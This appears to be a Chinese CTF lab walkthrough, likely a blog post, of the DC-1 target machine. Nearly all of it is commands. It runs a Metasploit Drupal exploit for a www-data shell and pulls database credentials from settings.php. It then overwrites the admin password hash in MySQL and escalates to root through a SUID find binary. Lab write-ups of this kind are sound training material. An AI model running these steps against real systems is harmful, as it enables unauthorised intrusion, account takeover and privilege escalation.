先查看IP ifconfig
寻找靶机的真实
ip nmap -sP 192.168.96.128/24
namp-A -p- -v 192.168.96.129(刚才查到的靶机的真实IP)
他是一个电信drupal 服务
Searchsploit drupal 7
MSF渗透
msfconsole 进入MSF控制台
search 搜索相应模块
use 对应模块
show options 查看信息
set RHOST 远程主机ip
run 攻击
输入msfdb run后在输入search Drupal
测试2018
use 1
让靶机运行msf
set rhosts 192.168.96.129
再run运作
执行whoami
输入shell
在输入whoami
发现是www-data权限
进入home
cd /home后ls 后cd flag4后ls发现flag4.txt 需要提升权限(python -c "import pty;pty.spawn('/bin/bash')"
)然后就cat flag4.txt
输入cd /var/www后输入ls查看www目录下文件,发现flag1.txt文件,打开发现提示信息,寻找站点的配置文件
cat flag1.txt
Drupal的默认配置文件为
查看cat /var/www/sites/default/settings.php发现了flag2和数据库的账号密码
flag2提示,提升权限为root来查看
输入mysql -u dbuser -p后输入 'R0ck3t',
进入数据库show databases;在切换到数据库use drupaldb进入表show tables;
查看查找默认的Drupal user 表select * from users;;
置换drupal密码
输入quit;
设置新密码php scripts/password-hash.sh 123
进入mysql,输入密码,切换到drupaldb数据库
mysql -u dbuser -pR0ck3t
use drupaldb
将pass字段进行替换
update users set
pass=" $S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw " where name="admin";
update users set pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where name="admin";
登录站点,打开浏览器输入靶机网址
192.168.96.129
账号admin
密码123
使用命令查看 suid 权限的可执行二进制程序
先quit
find / -perm -4000 2>/dev/null
发现find命令
使用命令测试,发现为root权限
touch 123
ls
find / -name 123 -exec "whoami" \;
发现最后的flag文件
标签:www,set,查看,DC,192.168,ls,简便,输入 From: https://blog.csdn.net/2401_85243367/article/details/142484398